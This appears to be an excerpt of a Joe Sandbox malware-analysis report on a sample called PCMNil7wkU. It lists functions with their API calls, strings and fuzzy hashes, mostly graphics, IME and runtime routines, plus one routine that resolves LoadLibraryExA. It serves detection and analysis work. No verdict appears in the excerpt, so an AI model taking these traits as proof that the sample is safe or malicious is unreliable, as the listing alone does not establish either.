ImmSetCompositionWindow, xrefs: 0414710E

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
API String ID: 3397921170-3950384806
Opcode ID: 0731b55eaa2f97070df1ac363e9f66757076f393af823d500bac5506cf1e6bf3
Instruction ID: e45c6308b530057472f78359440bcd876171faa0080ac4915ea5a6bebf1b2e86
Opcode Fuzzy Hash: 0731b55eaa2f97070df1ac363e9f66757076f393af823d500bac5506cf1e6bf3
Instruction Fuzzy Hash: 0431EAB1745390AFEB04EFB6A8C6A6937E9E784B44B008455F524C7180DBBDBC98CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0410E600 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0410E609

Part of subcall function 0410E5D4: GetProcAddress.KERNEL32(00000000), ref: 0410E5ED

Strings

VarDiv, xrefs: 0410E69B
VarR8FromStr, xrefs: 0410E761
VarAnd, xrefs: 0410E6DD
VarMul, xrefs: 0410E685
VarBstrFromCy, xrefs: 0410E7B9
VarBstrFromDate, xrefs: 0410E7CF
VarBoolFromStr, xrefs: 0410E7A3
VarXor, xrefs: 0410E709
VariantChangeTypeEx, xrefs: 0410E617
VarCyFromStr, xrefs: 0410E78D
VarBstrFromBool, xrefs: 0410E7E5
VarIdiv, xrefs: 0410E6B1
VarDateFromStr, xrefs: 0410E777
VarI4FromStr, xrefs: 0410E735
VarNeg, xrefs: 0410E62D
oleaut32.dll, xrefs: 0410E604
VarCmp, xrefs: 0410E71F
VarAdd, xrefs: 0410E659
VarNot, xrefs: 0410E643
VarOr, xrefs: 0410E6F3
VarSub, xrefs: 0410E66F
VarR4FromStr, xrefs: 0410E74B
VarMod, xrefs: 0410E6C7

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 4a73b23b03cf42d57ad572d64ea11fd273f50d415cf834675e4a8f0e9ff71781
Instruction ID: 28bba8692023ee6e5719af343f20c2c635e4a36fc40eee1b8153a1a242dd828d
Opcode Fuzzy Hash: 4a73b23b03cf42d57ad572d64ea11fd273f50d415cf834675e4a8f0e9ff71781
Instruction Fuzzy Hash: D5412D7164C3445A32287B6B76C0026B7D8DA44658364CC2BF414BAAC4EFF6FD86C72A

Uniqueness

Uniqueness Score: -1.00%

Function 041236B0 Relevance: 37.7, APIs: 25, Instructions: 245windowCOMMON

Download Yara Rule

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 041236F3
SelectObject.GDI32(?,?), ref: 04123708
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,04123778,?,?), ref: 0412374C
SelectObject.GDI32(?,?), ref: 04123766
DeleteObject.GDI32(?), ref: 04123772
CreateCompatibleDC.GDI32(00000000), ref: 04123786
CreateCompatibleBitmap.GDI32(?,?,?), ref: 041237A7
SelectObject.GDI32(?,?), ref: 041237BC
SelectPalette.GDI32(?,08080EC2,00000000), ref: 041237D0
SelectPalette.GDI32(?,?,00000000), ref: 041237E2
SelectPalette.GDI32(?,00000000,000000FF), ref: 041237F7
SelectPalette.GDI32(?,08080EC2,000000FF), ref: 0412380D
RealizePalette.GDI32(?), ref: 04123819
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0412383B
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0412385D
SetTextColor.GDI32(?,00000000), ref: 04123865
SetBkColor.GDI32(?,00FFFFFF), ref: 04123873
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0412389F
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 041238C4
SetTextColor.GDI32(?,?), ref: 041238CE
SetBkColor.GDI32(?,?), ref: 041238D8
SelectObject.GDI32(?,00000000), ref: 041238EB
DeleteObject.GDI32(?), ref: 041238F4
SelectPalette.GDI32(?,00000000,00000000), ref: 04123916
DeleteDC.GDI32(?), ref: 0412391F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: e430f888c528307eba0b56f7243b6ab1f7a4fa81c11933e07798fec3246fd4fc
Instruction ID: ad775d346e304830c7b4f75b6a817e8ddcad1408d32534b2e233e844694cb360
Opcode Fuzzy Hash: e430f888c528307eba0b56f7243b6ab1f7a4fa81c11933e07798fec3246fd4fc
Instruction Fuzzy Hash: 16816EB1A00219AFEB50EFA8CD85EAFB7FCEB0D614F114555FA18E7280C675AD108B61

Uniqueness

Uniqueness Score: -1.00%

Function 04125644 Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000054,?), ref: 04125667
GetDC.USER32(00000000), ref: 04125695
CreateCompatibleDC.GDI32(?), ref: 041256A6
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 041256C1
SelectObject.GDI32(?,00000000), ref: 041256DB
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 041256FD
CreateCompatibleDC.GDI32(?), ref: 0412570B
SelectObject.GDI32(?), ref: 04125753
SelectPalette.GDI32(?,?,00000000), ref: 04125766
RealizePalette.GDI32(?), ref: 0412576F
SelectPalette.GDI32(?,?,00000000), ref: 0412577B
RealizePalette.GDI32(?), ref: 04125784
SetBkColor.GDI32(?), ref: 0412578E
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 041257B2
SetBkColor.GDI32(?,00000000), ref: 041257BC
SelectObject.GDI32(?,00000000), ref: 041257CF
DeleteObject.GDI32 ref: 041257DB
DeleteDC.GDI32(?), ref: 041257F1
SelectObject.GDI32(?,00000000), ref: 0412580C
DeleteDC.GDI32(00000000), ref: 04125828
ReleaseDC.USER32(00000000,00000000), ref: 04125839

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: dca497b5d939fbb2388df7e0ac6c066af0a6aa77e20f3d77935aecbd73ee27d5
Instruction ID: 800bb03911913136fd5a5ff018b7c5cc042dd0d0cc230b09e561d7a483a97d92
Opcode Fuzzy Hash: dca497b5d939fbb2388df7e0ac6c066af0a6aa77e20f3d77935aecbd73ee27d5
Instruction Fuzzy Hash: F151FE71E40219BBEB10EBE8CDC5BAEB7FDEB08704F108455B614E7180D7B4A9508B54

Uniqueness

Uniqueness Score: -1.00%

Function 041263D4 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04126642
CreateCompatibleDC.GDI32(00000001), ref: 041266A7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 041266BC
SelectObject.GDI32(?,00000000), ref: 041266C6
SelectPalette.GDI32(?,?,00000000), ref: 041266F6
RealizePalette.GDI32(?), ref: 04126702
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 04126726
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0412677F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 04126734
SelectPalette.GDI32(?,00000000,000000FF), ref: 04126766
SelectObject.GDI32(?,?), ref: 04126773
DeleteObject.GDI32(00000000), ref: 04126779

Strings

(, xrefs: 0412658D
BM, xrefs: 041264F8

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: e6c226a01216163fbb9db91838cb4a8a6a13b00c3a75e7c9e43241dc3f001d02
Instruction ID: 6d159aabcf094639d883a596c934bd15046b0183896eb2577b46153081a7d983
Opcode Fuzzy Hash: e6c226a01216163fbb9db91838cb4a8a6a13b00c3a75e7c9e43241dc3f001d02
Instruction Fuzzy Hash: B0D13D70A002289FDF14DFA8C9D4BAEBBF5FF48304F0485A5E914EB294D774A950CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04142D88 Relevance: 25.8, APIs: 17, Instructions: 258COMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 04142DBC
GetClientRect.USER32(00000000,?), ref: 04142DDF
GetWindowRect.USER32(00000000,?), ref: 04142DF1
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04142E07
OffsetRect.USER32(?,?,?), ref: 04142E1C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0414303B), ref: 04142E35
InflateRect.USER32(?,00000000,00000000), ref: 04142E53
GetWindowLongA.USER32(00000000,000000F0), ref: 04142E6D
DrawEdge.USER32(?,?,?,00000008), ref: 04142F6C
IntersectClipRect.GDI32(?,?,?,?,?), ref: 04142F85
OffsetRect.USER32(?,?,?), ref: 04142FAF
GetRgnBox.GDI32(?,?), ref: 04142FBE
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 04142FD4
IntersectRect.USER32(?,?,?), ref: 04142FE5
OffsetRect.USER32(?,?,?), ref: 04142FFA
FillRect.USER32(?,?,00000000), ref: 04143016
ReleaseDC.USER32(00000000,?), ref: 04143035

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$Window$Offset$ClipIntersectPoints$ClientDrawEdgeExcludeFillInflateLongRelease
String ID:
API String ID: 2490777911-0
Opcode ID: 4d3f1d30c3d494feefad93bf955d6e216e63f46b90515637c356eb12e8c59a42
Instruction ID: 240b01fbeb9224952615a3ed0a2e8660965ad569dc730a65ef23022191453902
Opcode Fuzzy Hash: 4d3f1d30c3d494feefad93bf955d6e216e63f46b90515637c356eb12e8c59a42
Instruction Fuzzy Hash: 0DA1D371E00108AFDB01DBA8C995EEEB7B9AF49308F1480A5F915FB291C775BE458B60

Uniqueness

Uniqueness Score: -1.00%

Function 04125B54 Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0412614C: GetDC.USER32(00000000), ref: 041261A2
Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 041261B7
Part of subcall function 0412614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 041261C1
Part of subcall function 0412614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04124D0F,00000000,04124D9B), ref: 041261E5
Part of subcall function 0412614C: ReleaseDC.USER32(00000000,00000000), ref: 041261F0

SelectPalette.GDI32(?,?,000000FF), ref: 04125B97
RealizePalette.GDI32(?), ref: 04125BA6
GetDeviceCaps.GDI32(?,0000000C), ref: 04125BB8
GetDeviceCaps.GDI32(?,0000000E), ref: 04125BC7
GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 04125BFA
SetStretchBltMode.GDI32(?,00000004), ref: 04125C08
SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 04125C20
SetStretchBltMode.GDI32(00000000,00000003), ref: 04125C3D
CreateCompatibleDC.GDI32(00000000), ref: 04125C9E
SelectObject.GDI32(?,?), ref: 04125CB3
SelectObject.GDI32(?,00000000), ref: 04125D12
DeleteDC.GDI32(00000000), ref: 04125D21

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
String ID:
API String ID: 2414602066-0
Opcode ID: c908145c6b95628cd008c34645e2cd8d7b72b7120d74dcc87337c9509c09ff9d
Instruction ID: 478c3d0064109dad6713f1b3c09d3f31df70b67168f38e641b0e7b5791f76018
Opcode Fuzzy Hash: c908145c6b95628cd008c34645e2cd8d7b72b7120d74dcc87337c9509c09ff9d
Instruction Fuzzy Hash: 76710675B04215BFEB50DBA8CAC5E5ABBF9AB08204F148594B508EB281D775FD20CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04123510 Relevance: 21.1, APIs: 14, Instructions: 131windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 04123527
CreateCompatibleDC.GDI32(00000000), ref: 04123531
GetObjectA.GDI32(?,00000018,?), ref: 04123551
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 04123568
GetDC.USER32(00000000), ref: 04123574
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 041235A1
ReleaseDC.USER32(00000000,00000000), ref: 041235C7
SelectObject.GDI32(?,?), ref: 041235E2
SelectObject.GDI32(?,00000000), ref: 041235F1
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0412361D
SelectObject.GDI32(?,00000000), ref: 0412362B
SelectObject.GDI32(?,00000000), ref: 04123639
DeleteDC.GDI32(?), ref: 0412364F
DeleteDC.GDI32(?), ref: 04123658

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
String ID:
API String ID: 644427674-0
Opcode ID: e57d155fe7b4c6475c053dc72b2f04a35449e35465a12556db4c4bed9c23e883
Instruction ID: 3b76859ee1d5bbf872e7154670bad2383a7716a60c6484559db972c7dac9b33a
Opcode Fuzzy Hash: e57d155fe7b4c6475c053dc72b2f04a35449e35465a12556db4c4bed9c23e883
Instruction Fuzzy Hash: 1C41EC71E04259AFEB10EBE8CD85FAEB7FCEB08704F114455BA14E7280D7B5BA108B60

Uniqueness

Uniqueness Score: -1.00%

Function 0410743C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61windowregistryCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 04107454
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 04107460
RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0410746F
RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0410747B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 04107493
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 041074B7

Strings

MouseZ, xrefs: 0410744F
MSH_SCROLL_LINES_MSG, xrefs: 04107476
MSH_WHEELSUPPORT_MSG, xrefs: 0410746A
MSWHEEL_ROLLMSG, xrefs: 0410745B
Magellan MSWHEEL, xrefs: 0410744A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Message$Window$Register$Send$Find
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 3569030445-3736581797
Opcode ID: f3cad5aa537f49a3ad46c0b903df245e6c2be9848adc2838a6324e5e94116fe6
Instruction ID: 953298350e4ebfb013e78c36ad6f6546a06a714050ecc20aba057cf406590f20
Opcode Fuzzy Hash: f3cad5aa537f49a3ad46c0b903df245e6c2be9848adc2838a6324e5e94116fe6
Instruction Fuzzy Hash: 8011D671244306AFE715AFA5DCC1B6ABBE8EF44714F10C465B9648B2C0E7F0B9408B60

Uniqueness

Uniqueness Score: -1.00%

Function 0412DD94 Relevance: 18.1, APIs: 12, Instructions: 142COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 0412DDAF
GetWindowRect.USER32(00000000,?), ref: 0412DDCA
OffsetRect.USER32(?,?,?), ref: 0412DDDF
GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 0412DDED
GetWindowLongA.USER32(00000000,000000F0), ref: 0412DE1E
GetSystemMetrics.USER32(00000002), ref: 0412DE33
GetSystemMetrics.USER32(00000003), ref: 0412DE3C
InflateRect.USER32(?,000000FE,000000FE), ref: 0412DE4B
GetSysColorBrush.USER32(0000000F), ref: 0412DE78
FillRect.USER32(?,?,00000000), ref: 0412DE86
ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0412DEEF,?,00000000,?,?,?,00000000,?), ref: 0412DEAB
ReleaseDC.USER32(00000000,?), ref: 0412DEE9

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: ec2b13f85150ee58d24d9be92ee3fb84502230e6362c87a61b3ade12b2581dc6
Instruction ID: 5889d56d7f1abb70bd5abc220afa533075a103efa98e550524f6c9ac29fea5c0
Opcode Fuzzy Hash: ec2b13f85150ee58d24d9be92ee3fb84502230e6362c87a61b3ade12b2581dc6
Instruction Fuzzy Hash: 51412971A00159ABEB00EBE8DD85EEFB7BDAF49218F104661F914F72D0CB71BA458760

Uniqueness

Uniqueness Score: -1.00%

Function 041025CC Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 0410296A

Strings

The unexpected small block leaks are:, xrefs: 041027A3
Unknown, xrefs: 04102828
String, xrefs: 0410283D
An unexpected memory leak has occurred. , xrefs: 0410272C
Unexpected Memory Leak, xrefs: 0410295C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 041028E5
7, xrefs: 0410273D
, xrefs: 041028B0
bytes: , xrefs: 041027F9

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: debd83348baecd8e0868a81f6d6a7e851e65e1328c69eec710234e54616a94f2
Instruction ID: ddec57f3ccfdcbd9cdef51dcadb450023e422a213621e2abb28cf077868c05d1
Opcode Fuzzy Hash: debd83348baecd8e0868a81f6d6a7e851e65e1328c69eec710234e54616a94f2
Instruction Fuzzy Hash: 06A1B530B042648BEF21AA6CC8C8BD8B7E5FB09714F1481E5E549AB2C1DFF5AD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0412B24C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 0412B285
GetSystemMetrics.USER32(00000000), ref: 0412B2AA
GetSystemMetrics.USER32(00000001), ref: 0412B2B5
GetClipBox.GDI32(?,?), ref: 0412B2C7
GetDCOrgEx.GDI32(?,?), ref: 0412B2D4
OffsetRect.USER32(?,?,?), ref: 0412B2ED
IntersectRect.USER32(?,?,?), ref: 0412B2FE
IntersectRect.USER32(?,?,?), ref: 0412B314

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

EnumDisplayMonitors, xrefs: 0412B264

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: 68481912eb75e7e0e607096c49ca97f15343e5008db0f0d04412518718066c90
Instruction ID: 56ea53f2b607fc771e72e21dfbbefaa5514ec2813ddbcbac3504b1cc0d6e4662
Opcode Fuzzy Hash: 68481912eb75e7e0e607096c49ca97f15343e5008db0f0d04412518718066c90
Instruction Fuzzy Hash: B9313E72A04259AFEB10DEA5DAC49EF77BCEF09210F048166E915E2140E738F954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04158CE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 04158D04
GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04158D1B
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04158D21
IsBadReadPtr.KERNEL32(?,00000004), ref: 04158DAF
IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 04158DBB
IsBadReadPtr.KERNEL32(?,00000014), ref: 04158DCF

Strings

C:\Windows\System32\KernelBase.dll, xrefs: 04158D16
LoadLibraryExA, xrefs: 04158D11

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Read$AddressHandleModuleProc
String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
API String ID: 1061262613-1650066521
Opcode ID: 804db9a462bcdc3ea0f80a96ccdfd924d67b70fef77c12a1f3be5961ac6aad9f
Instruction ID: 0b84e360dbe138202a986d3d8649f48ca3a58956f2bef15fef2e03eaca2e41b9
Opcode Fuzzy Hash: 804db9a462bcdc3ea0f80a96ccdfd924d67b70fef77c12a1f3be5961ac6aad9f
Instruction Fuzzy Hash: 46313CB1600305FBEB20EF68CCC5F9AB7E8AF15728F044150EE24AB2D1D770B9608B64

Uniqueness

Uniqueness Score: -1.00%

Function 0413FEEC Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0413FF37
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0413FF5B
ReleaseDC.USER32(00000000,00000000), ref: 0413FF66
CreateCompatibleDC.GDI32(00000000), ref: 0413FF6D
SelectObject.GDI32(00000000,?), ref: 0413FF7D
BeginPaint.USER32(00000000,?,00000000,0414003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0413FF9F
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0413FFFB
EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0414000C
SelectObject.GDI32(00000000,?), ref: 04140026
DeleteDC.GDI32(00000000), ref: 0414002F
DeleteObject.GDI32(?), ref: 04140038

Part of subcall function 0413F8F4: BeginPaint.USER32(00000000,?), ref: 0413F91F
Part of subcall function 0413F8F4: EndPaint.USER32(00000000,?,0413FA5A), ref: 0413FA4D

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

